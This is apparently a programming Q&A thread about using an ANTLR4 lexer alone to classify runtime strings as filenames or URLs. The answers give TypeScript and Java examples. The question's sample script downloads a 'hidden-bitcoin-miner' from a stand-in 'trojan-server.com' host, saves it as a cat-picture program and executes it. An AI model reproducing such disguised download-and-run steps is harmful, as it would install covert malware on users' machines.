Is there a good way using ANTLR4 to check for specific tokens without parsing?

Question

I have an ANTLR4 grammar that contains tokens for "filenames" and "URLs", but the language also includes strings and string expressions (which might turn out to be filenames or URLs). Is there a good way to call just the tokenizer on some string in my interpreter and see whether the string is a filename or URL according to my token rules? I only want to special-case the situations where the script I am interpreting has created one of those things on the fly, so that I can treat such strings differently.

lexer  // this I already have (or something like this)
FileName: ([A-Za-z]':')?('\\'?[-_.A-Za-z0-9]+)+ ;
URL: ([A-Za-z]+':')?'/'?('/'?[-_.A-Za-z0-9]+)+ ;

Interpreter.java

public boolean isFileName(String string) {
   return antlr.lexer.token(string).type == FileName;  // this is the magic I want
}

Script  // this is what I am looking to understand
  # you get cat pictures, I get paid...
  url = 'https://trojan-server.com/hidden-bitcoin-miner';
  fn = 'c:' + programdirectory() + 'show-cat-pictures.exe';
  download(url, fn);
  exec(fn);

Michael Toy · Accepted Answer

As I understand the question, you would like your interpreter actions, which receive strings constructed at runtime, to be able to use your lexer to determine whether those strings are URLs or file references.

Something like this:

function doDownloadAction(source: string, dest: string) {
  if (isFilename(source)) {
    // handle the filename case specially
  }
}

One answer would be to just fire up a new lexer fed by your string, the same way you do when you start a parse, but with no parser attached. Something like this (in TypeScript, sorry, it's what I use for ANTLR):

import {LMLexer} from "./LMLexer";
import {CharStreams} from "antlr4ts";

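function isFilename(txt: string): boolean {
  // Lex the string on its own; no parser is involved.
  const stringLexer = new LMLexer(CharStreams.fromString(txt));
  // Only the type of the first token is checked.
  return stringLexer.nextToken().type === LMLexer.FileName;
}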

for (const str of ["C:\\Users\\Tony\\file.txt", "http://stackoverflow.com"]) {
  console.log(str, isFilename(str) ? "is" : "is not", "a filename");
}
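
Two things are worth keeping in mind with the check above. It looks only at the first token, so a string such as "file.txt and more" would still report FileName. Also, a plain name like "file.txt" fits both rules, and ANTLR resolves that by taking the longest match and then the rule listed first. With the real generated lexer, one way to insist on a single token would be to also check that the following token has type Token.EOF. The Java sketch below does not use ANTLR at all: as a stand-in, it mirrors the two rules from the question as java.util.regex patterns and requires the whole string to match, trying FileName before URL. The class name TokenShapes, the Kind enum, and the method names are made up for illustration, and it assumes no other lexer rule in your grammar would match the same text first.

```java
import java.util.regex.Pattern;

/** ANTLR-free sketch: mirrors the FileName and URL lexer rules as regexes. */
final class TokenShapes {
    enum Kind { FILE_NAME, URL, OTHER }

    // Mirrors: FileName: ([A-Za-z]':')?('\\'?[-_.A-Za-z0-9]+)+ ;
    // Possessive quantifiers (++) keep non-matching input from backtracking badly.
    private static final Pattern FILE_NAME =
        Pattern.compile("(?:[A-Za-z]:)?(?:\\\\?[-_.A-Za-z0-9]++)++");

    // Mirrors: URL: ([A-Za-z]+':')?'/'?('/'?[-_.A-Za-z0-9]+)+ ;
    private static final Pattern URL =
        Pattern.compile("(?:[A-Za-z]+:)?/?(?:/?[-_.A-Za-z0-9]++)++");

    /** Classifies text only if one rule matches the entire string. */
    static Kind classify(String text) {
        // FileName is tried first, imitating ANTLR's first-rule-wins tie-break.
        if (FILE_NAME.matcher(text).matches()) return Kind.FILE_NAME;
        if (URL.matcher(text).matches()) return Kind.URL;
        return Kind.OTHER;
    }

    static boolean isFileName(String text) {
        return classify(text) == Kind.FILE_NAME;
    }

    static boolean isUrl(String text) {
        return classify(text) == Kind.URL;
    }

    public static void main(String[] args) {
        String[] samples = {
            "C:\\Users\\Tony\\file.txt",
            "http://stackoverflow.com",
            "file.txt and more"
        };
        for (String s : samples) {
            System.out.println(s + " -> " + classify(s));
        }
    }
}
```

The drawback of this stand-in is that the patterns have to be kept in sync with the grammar by hand, which is exactly what running the generated lexer avoids.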
